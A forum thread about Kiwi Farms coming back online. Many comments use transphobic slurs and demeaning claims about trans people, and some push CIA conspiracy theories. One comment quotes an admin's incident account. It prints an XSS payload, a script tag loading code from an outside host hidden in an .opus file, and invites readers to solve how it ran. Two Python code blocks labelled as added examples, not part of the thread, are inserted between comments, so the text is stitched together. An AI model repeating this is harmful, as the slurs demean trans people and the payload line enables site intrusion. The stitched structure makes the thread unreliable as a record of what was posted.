Kiwi Farms lives on the clear net again!
submitted 1 year ago by [deleted] from i.imgur.com
[–][deleted] 9 insightful - 3 fun9 insightful - 2 fun10 insightful - 2 fun10 insightful - 3 fun - 1 year ago (11 children)
i'm really glad about it but....so what? Troons probably will just attack farms again soon.😮💨
[–][deleted] 4 insightful - 2 fun4 insightful - 1 fun5 insightful - 1 fun5 insightful - 2 fun - 1 year ago (10 children)
It's already being DDoSed. It's slow as shit.
[–][deleted] 5 insightful - 3 fun5 insightful - 2 fun6 insightful - 2 fun6 insightful - 3 fun - 1 year ago (8 children)
See? told ya 😮💨
[–]IndianaJones 4 insightful - 3 fun4 insightful - 2 fun5 insightful - 2 fun5 insightful - 3 fun - 1 year ago (7 children)
I'm surprised troons are smart enough to ddos. I thought they'd be the type to trip on bananas or some shit kek, they don't seem very bright.
[–][deleted] 8 insightful - 3 fun8 insightful - 2 fun9 insightful - 2 fun9 insightful - 3 fun - 1 year ago (3 children)
Don't misunderstand troons, my dude. Many of them are highly intelligent and know perfectly what they are doing. Also, many troons are talented programmers and have shit tons of free time.
[–]jet199 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 1 fun4 insightful - 2 fun - 1 year ago (1 child)
I did once walk in on a debate between troons over whether using a certain programming language can turn you trans.
Apparently python is one to avoid.
[–][deleted] 5 insightful - 5 fun5 insightful - 4 fun6 insightful - 4 fun6 insightful - 5 fun - 1 year ago (0 children)
Lol xd
But yeah, it's fucking bizarre how many programmers are trooning out.🤔
[–]IndianaJones 2 insightful - 1 fun2 insightful - 0 fun3 insightful - 0 fun3 insightful - 1 fun - 1 year ago (0 children)
oh ok sorry
[–]jet199 6 insightful - 2 fun6 insightful - 1 fun7 insightful - 1 fun7 insightful - 2 fun - 1 year ago (2 children)
They don't call them programmer's socks for nothing.
Most trans, even if smart, eventually start claiming disability so they can sit at home all day and wage solo cyber-warfare campaigns against normal decent people.
If not smart they will just become dull social media bots. There are a couple of troons on twitter with over 300 accounts each and that's all they do with their lives.
[–]IndianaJones 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 1 fun4 insightful - 2 fun - 1 year ago (0 children)
Sounds like a pretty sad life! They make me feel better about myself. Haha.
Damn! It's like Jurassic Park out here!
[–]fuk 1 insightful - 1 fun1 insightful - 0 fun2 insightful - 0 fun2 insightful - 1 fun - 1 year ago* (0 children)
TIL, thanks. Any sources for this claim?
[–][deleted] 3 insightful - 4 fun3 insightful - 3 fun4 insightful - 3 fun4 insightful - 4 fun - 1 year ago (4 children)
What is a clearnet and why do they farm kiwis there?
[–][deleted] 4 insightful - 2 fun4 insightful - 1 fun5 insightful - 1 fun5 insightful - 2 fun - 1 year ago (3 children)
Clear net is just the regular web, not the "dark" web. Kiwi Farms is a site where people obsess over lolcows, crazy internet people.
[–][deleted] 3 insightful - 1 fun3 insightful - 0 fun4 insightful - 0 fun4 insightful - 1 fun - 1 year ago (0 children)
👍
[–][deleted] 1 year ago (1 child)
[deleted]
[–][deleted] 1 insightful - 1 fun1 insightful - 0 fun2 insightful - 0 fun2 insightful - 1 fun - 1 year ago (0 children)
I don't condone it, but I kind of understand when people lash out against the police, abuses are all too common. Does seem weird though he had just sent an apology to the police department and supported blue lives matter.
[–][deleted] 1 year ago (6 children)
[–][deleted] 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 1 fun2 insightful - 2 fun - 1 year ago (5 children)
I don't recall reading anything about the password situation besides he didn't think they'd been compromised but it was best to be safe rather than sorry. Apparently the forum software Xenforo does salt and hash passwords, but I've read a technique called rainbow tables can be used to glean the password anyways.
Or he might have modified the code, or it was an obsolete version. Apparently their license for that software has not been renewed for some time because of the content of the site and things are out of date.
[–][deleted] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 1 fun3 insightful - 2 fun - 1 year ago* (4 children)
Apparently the forum software Xenforo does salt and hash passwords, but I've read a technique called rainbow tables can be used to glean the password anyways.
Rainbow table attacks can break 1-way hashing alone, but salting should prevent this
[–][deleted] 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 1 fun2 insightful - 2 fun - 1 year ago (3 children)
Interesting. The attacker was able to gain admin access and had free roam of the system for a bit, I imagine this means the salt was compromised and then the rainbow table attack could still work, just take a bit longer.
The site was compromised through his custom chat code, made me think of you actually. The attacker was able to upload a .. fuck, forgot the extension but some audio format file I think (.opus?), and XenForo doesn't verify data. It wasn't audio but a script and somehow it was able to be executed even though it shouldn't have had the permissions. I can look for the Telegram message if you're interested. That got them admin, they tried to get the user data, but it was too big and crashed the system (lol), so instead they just deleted everything.
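On the salting and rainbow-table exchange in the comments above, an added example (not from the thread, and not XenForo's code) showing what a per-user salt changes: a table precomputed once no longer matches anything, and because the salt is stored beside the hash rather than kept secret, knowing it only lets someone re-hash guesses one user at a time at the cost set by the work factor. PBKDF2 here is an assumption standing in for whatever slow hash the forum software actually uses, and the word list is constructed.

```python
import hashlib
import hmac
import os

# Constructed word list standing in for a precomputed (rainbow-style) table.
CANDIDATES = ["123456", "password", "hunter2", "letmein"]
ITERATIONS = 100_000  # work factor: every single guess costs this many rounds


def hash_unsalted(password):
    """Fast, unsalted hash: identical passwords give identical digests."""
    return hashlib.sha256(password.encode()).hexdigest()


def build_table(words):
    """Computed once, then reusable against every unsalted hash anywhere."""
    return {hash_unsalted(w): w for w in words}


def hash_salted(password, salt=None):
    """Random per-user salt plus a slow KDF; the salt is stored with the hash."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


def verify(password, salt, digest):
    """Login check: recompute with the stored salt, compare in constant time."""
    _, candidate = hash_salted(password, salt)
    return hmac.compare_digest(candidate, digest)


def per_user_guesses(words, salt, digest):
    """With the salt known, nothing precomputed helps: each guess is a full
    KDF run for this one user. Returns (KDF runs spent, password or None)."""
    for spent, word in enumerate(words, 1):
        if verify(word, salt, digest):
            return spent, word
    return len(words), None


if __name__ == "__main__":
    table = build_table(CANDIDATES)
    print("unsalted lookup:", table.get(hash_unsalted("hunter2")))
    salt, digest = hash_salted("hunter2")
    print("salted lookup:  ", table.get(digest.hex()))
    print("per-user work:  ", per_user_guesses(CANDIDATES, salt, digest))
```
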
[–][deleted] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 1 fun3 insightful - 2 fun - 1 year ago (2 children)
Deleted everything? damn I hope they had backups. Yeah definitely curious as to what exactly happened here if you come across the info
[–][deleted] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 1 fun3 insightful - 2 fun - 1 year ago (1 child)
It was all backed up. This is from the Telegram: (link)
The issue was a script injection. I am working on the details. Here is my challenge to any hackers or aspiring hackers.
There is a file called troonshine.opus, with the contents of this: <!DOCTYPE html> <script src=//poz.hiv/load.js></script>
The web document, on the same domain, has a CORS rule that looks like this: <meta http-equiv="Content-Security-Policy" content="script-src 'self' 'nonce-0113ffa9cf5af884e070dd1e36188e5db5ba4bbdacaef1c21a733cea089a7fce'" />
What could you possibly put into that document to get it to load the .opus and have the script execute?
The more finer details are this: XenForo does not validate any file contents. You can write an .opus file that is basically just an HTML document loading a script off-site and if you somehow open it, it does run. I have confirmed this.
The question is of how it got injected. The chat on Kiwi Farms was a Rust websocket chat that was part of a forum rewrite I had been working on. Relevant source: https://github.com/jaw-sh/ruforo/blob/master/src/bin/xf_chat/main.rs https://github.com/jaw-sh/ruforo/blob/master/resources/js/chat.js https://github.com/jaw-sh/ruforo/tree/master/src/bbcode
What baffles me is that even if we did theoretically pass the client a message that was simply instruction to load another script, it should not work, because the security policy of the chat explicitly says that no scripts should run — EVEN FROM THE SAME DOMAIN — unless they are given a nonce token. I know it happened in the chat, though, because I found the access.log entry where it gets opened: x.x.x.x - - [18/Sep/2022:03:03:53 -0400] "GET /data/audio/3696/3696202-c63cc36fd4acb874fdebd0b3988c3410.opus HTTP/1.1" 200 90 "https://kiwifarms.st/test-chat?style=dark" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
So what can be done to make an .opus media file load as an inline web document which can execute its own scripts that violate the CORS of the web document it's loaded into? I just don't understand.
jcmoon@pm.me P.S. If you're going to write me and take credit for the attack, include the name of the random user you made an admin.
Edit: I believe that the .opus file with the xss payload was injected via an iframe that was somehow added to chat. I don't know how they rendered an iframe but that would work.
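The quoted message says the forum software did not validate uploaded file contents and that the policy in the chat page did not stop the file's script. As an added example (not XenForo or ruforo code; all function names are hypothetical), this checks that an `.opus` upload really begins with an Ogg page carrying an `OpusHead` packet, and builds response headers for stored media so that a file opened directly or in a frame carries its own restrictive policy. A Content-Security-Policy governs only the document that declares it, which is why the upload's own response headers matter here.

```python
import struct

OGG_MAGIC = b"OggS"       # Ogg page capture pattern
OPUS_MAGIC = b"OpusHead"  # first packet of an Ogg Opus stream (RFC 7845)
BOS_FLAG = 0x02           # header_type bit: beginning of stream


def looks_like_opus(data):
    """True only if data starts with an Ogg beginning-of-stream page whose
    first packet is an OpusHead header. The page CRC is not verified."""
    if len(data) < 27 or data[:4] != OGG_MAGIC:
        return False
    version, header_type, n_segments = data[4], data[5], data[26]
    if version != 0 or not header_type & BOS_FLAG:
        return False
    start = 27 + n_segments
    if len(data) < start:
        return False
    payload = data[start:start + sum(data[27:start])]
    # OpusHead is at least 19 bytes; upper 4 bits of its version must be 0.
    return (len(payload) >= 19 and payload[:8] == OPUS_MAGIC
            and payload[8] & 0xF0 == 0)


def accept_upload(filename, data):
    """Reject files whose bytes do not match the type their name claims."""
    if not filename.lower().endswith(".opus"):
        return False, "extension not handled by this example"
    if not looks_like_opus(data):
        return False, "content is not Ogg Opus"
    return True, "ok"


def media_response_headers():
    """Headers for serving stored uploads from the application's origin."""
    return {
        "Content-Type": "audio/ogg",          # fixed by the server, never guessed
        "X-Content-Type-Options": "nosniff",  # browser must not re-interpret it
        # If the file is ever rendered as a document, it gets no scripts and
        # an opaque origin instead of the site's origin.
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


def make_sample_opus():
    """Constructed minimal first page of an Ogg Opus stream (CRC left as 0)."""
    head = OPUS_MAGIC + struct.pack("<BBHIhB", 1, 2, 312, 48000, 0, 0)
    page = OGG_MAGIC + struct.pack("<BBqIIIB", 0, BOS_FLAG, 0, 1, 0, 0, 1)
    return page + bytes([len(head)]) + head


# Constructed stand-in for an HTML document saved with an .opus extension.
HTML_AS_OPUS = b"<!DOCTYPE html> <script src=//example.invalid/x.js></script>"

if __name__ == "__main__":
    print(accept_upload("clip.opus", make_sample_opus()))
    print(accept_upload("clip.opus", HTML_AS_OPUS))
    print(media_response_headers())
```
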
[–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 1 fun4 insightful - 2 fun - 1 year ago* (0 children)
The chat on Kiwi Farms was a Rust websocket chat that was part of a forum rewrite I had been working on
Yikes, lol, I see why this reminded you of me. Hacking his rusty forum and chat hits a little close to home
So the good news is it doesn't sound like a rainbow table attack was able to break hashed and salted passwords. That would be catastrophic for security. An XSS attack is a more sensible attack vector for something like this. I am no hacker or security expert, but if there was a problem with his code, or even an underlying library that could be exploited, it would explain this. In the server I'm working on, I use the actix-cors library and if anyone can exploit that library I'd be boned, my code depends on all those library implementations being correct even if I do everything right on my end.
[–]Site_rly_sux 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 1 fun2 insightful - 2 fun - 1 year ago (15 children)
Weird that the new world order, which you believed was all-powerful and all-encompassing, seems to have...forgotten?....that just a few weeks ago they tried to censor this stalking deaththreat website.
Would you agree with me that a powerful conspiracy probably wasn't behind KF being removed from Cloudflare? Or you think they just forgot about it after a week or two?
[–][deleted] 7 insightful - 3 fun7 insightful - 2 fun8 insightful - 2 fun8 insightful - 3 fun - 1 year ago* (8 children)
Would you agree with me that a powerful conspiracy probably wasn't behind KF being removed from Cloudflare?
Conspiracy? It was a campaign by Keffals. https://teddit.net/r/keffals/comments/x2bzvx/welcome_to_the_official_subreddit_of_the/
They lobbied to get Joshua Moon kicked off Cloudflare so they could DDoS the shit out of the site, pretty sure it's happening again right now.
have...forgotten?....that
Forgotten? Fuck no, I don't know how many companies have dropped Kiwi Farms and Josh so far, but it's been quite the journey to getting the site back, he's probably using some foreign janky ass services, and it is recovering from a hack.
stalking deaththreat website
That's misinformation. It turns out it wasn't even the site that doxxed Keffals, the thinking it was because KF was shining light on him getting DIY hormones to minors.
[–]Site_rly_sux 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 1 fun2 insightful - 2 fun - 1 year ago (7 children)
It was a campaign by Keffals
They lobbied to get Joshua Moon kicked off
the thinking it was because KF was shining light on him
Look at all the mental gymnastics you have to do, in order to justify your blind belief in whatever the KF admins tell you must have happened.
If only there was a primary source we could check in with, so we didn't have to solely believe the guilty party's version of events.
Oh wait, there is. The decision maker himself already wrote why KF was removed. And it was because of the threats of violence that he observed during his personal browsing of that website.
https://blog.cloudflare.com/kiwifarms-blocked/
the rhetoric on the Kiwifarms site and specific, targeted threats have escalated over the last 48 hours to the point that we believe there is an unprecedented emergency and immediate threat to human life unlike we have previously seen from Kiwifarms or any other customer before
[–][deleted] 6 insightful - 2 fun6 insightful - 1 fun7 insightful - 1 fun7 insightful - 2 fun - 1 year ago (6 children)
Since the Christchurch shooting censorship I have infrequently visited Kiwi Farms. I don't see these things they're accused of. The lolcows are their entertainment, they hardly want them to die, there'd be no more entertainment. And the site doesn't endorse anything illegal, users are banned permanently for that. Lots of fucked up things happen on Facebook but they don't get shut down over it, just the little guy.
This is the story the news wouldn't tell, the other side of it: https://kiwifarms.net/threads/dropkiwifarms.128421/
Here's a screen shot it's very detailed, and too long for the entire thing to fit, there's a lot more.
primary source
Like me, a sometimes Kiwi Farms user or that dude who took a quick trip over there and was scared by all the autists.
And think about what sort of people you're defending, Keffals, a piece of shit who delights in helping minors get DIY hormones. That's highly illegal and so's the DDoSing.
[–]Site_rly_sux 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 1 fun2 insightful - 2 fun - 1 year ago (5 children)
Bruh you had to make a screenshot too long to fit rather than face up to the obvious
primary source Like me
Like me
No - primary source like the original man, the selfsame person who personally decided to take KF off of CF and wrote down his exact reasons why, which I quoted to you above. That kind of primary source
[–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 1 fun4 insightful - 2 fun - 1 year ago (4 children)
https://archive.ph/8g76E here's an archive, probably easier to read if you'd bother to look at the other side of something, only way you're ever going to be able to make an informed decision. And you might even wonder why the version you heard about is so different from the reality of the situation, and on channels you probably thought were accurate and didn't just run anything in a press kit they're paid to.
You said he just personally browsed there. Sounded like maybe once. I was there more. The reason that was initiated was from a letter writing campaign started by Keffals. They got them booted off more than just Cloudflare, that was just the opening shot. Kiwifarms.is, kiwifarms.st, they went through a lot of different domains and providers. Kept getting dropped.
[–]Site_rly_sux 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 1 fun2 insightful - 2 fun - 1 year ago (3 children)
even wonder why the version you heard about is so different from the reality of the situation, and on channels you probably thought were accurate
Dipshit not only is this NOT a topic that is being discussed outside of Q-adjacent conspiracy communities
But if it was, and the common understanding was not aligned with the wall of text nonsense you're trying to link me to, it would probably be because they're BULLSHITTERS
You said he just personally browsed there. Sounded like maybe once. I was there more.
Facepalm. Yeah but you're not the founder and CEO of cloudflare are you. Unlike the guy I linked you to. And you don't make decisions about what kind of content is too extreme for their platform. And that man was the CEO and was the founder and did make the decision and wrote down exactly why. And yet you find a wall of bullshit too large for a screenshot more credible 🤔...really says a lot about how you take in information for your worldview
[–][deleted] 4 insightful - 2 fun4 insightful - 1 fun5 insightful - 1 fun5 insightful - 2 fun - 1 year ago (2 children)
Remember I showed you how to do a search: https://duckduckgo.com/?q=kiwi+farms&t=brave&iar=news&ia=news is Time magazine and CNN "Q-adjacent conspiracy communities"?
And yet you find a wall of bullshit too large for a screenshot more credible
It all checks out as far as I can tell and lines up with my own experience.
[–]Site_rly_sux 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 1 fun2 insightful - 2 fun - 1 year ago (1 child)
duckduckgo
The youngest story on there is 8 days ago. Today's development is not a hot topic is it
It all checks out as far as I can tell
Oh really
What checks did you do
Did you compare it against the primary source of the written word of the man who personally took the decision about the company he founded and managed. Did you try running that comparison
[–][deleted] 4 insightful - 2 fun4 insightful - 1 fun5 insightful - 1 fun5 insightful - 2 fun - 1 year ago (0 children)
Today's development is not a hot topic is it
The site coming back is not being covered in the news, although it's an incredibly important story in my estimation. You usually can't fight against big tech, but there's one man doing it. Fighting for his right for him and his fellow autists to be able to make fun of internet celebrities again, which is super fucking lame imo, but freedom of speech causes are often not exactly noble seeming, like Larry Flynt's efforts.
Did you compare it against the primary source of the written word of the man who personally took the decision about the company he founded and managed.
No, that was nonsense. I took it right from the horse's mouth, checked out the long and detailed explanation Joshua Moon wrote, along with links, and I see nothing false about it, and I also don't see any users in that thread disagreeing with the facts as outlined. You might expect users to not want to incriminate themselves, but thousands of people would hardly work seamlessly to lie.
[–]LarrySwinger2 5 insightful - 3 fun5 insightful - 2 fun6 insightful - 2 fun6 insightful - 3 fun - 1 year ago (5 children)
The CIA infiltrates groups and companies, from within which they work toward their own covert agenda, and it looks like something organic on the surface. A conspiracy is hard to prove, but I do think a large portion of woke outrage is engineered. The goal is a slow encroachment of civil liberties; they want to make it difficult to host free speech sites, without caring too much about KF in particular. If you look at the smear attack against RMS a couple years ago, you'll see something shady going on, namely that the main articles in that campaign were written by someone who worked for a company that opposes free software. So if there's covert activity going on now, it wouldn't be the first time.
[–]Site_rly_sux 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 1 fun2 insightful - 2 fun - 1 year ago (4 children)
Ok genius so answer this. In your theory has the CIA just forgotten to remove them off the clearweb? Did they forget that they were supposed to be working on this?
CC u/muskrat - because muskrat didn't think it was the CIA yet this dude thinks it was.
[–][deleted] 5 insightful - 2 fun5 insightful - 1 fun6 insightful - 1 fun6 insightful - 2 fun - 1 year ago (0 children)
Keffals the troon, not the CIA. Can't you read?
[–]LarrySwinger2 2 insightful - 1 fun2 insightful - 0 fun3 insightful - 0 fun3 insightful - 1 fun - 1 year ago (2 children)
I'm leaving open the possibility of CIA involvement, and if it is, it's part of a slow encroachment. It could of course be authentic woke BS.
Alright so you have enough of a CIA theory that they're there, they're in the mix, there's an outline of their involvement.
But because you're basing it on zero evidence other than a conspiracist's mindset, you're unable to answer specifics, like why they seem to have forgotten about it a week later. Is that right?
[–]LarrySwinger2 1 insightful - 1 fun1 insightful - 0 fun2 insightful - 0 fun2 insightful - 1 fun - 1 year ago (0 children)
I've addressed your question twice now. Lrn2read.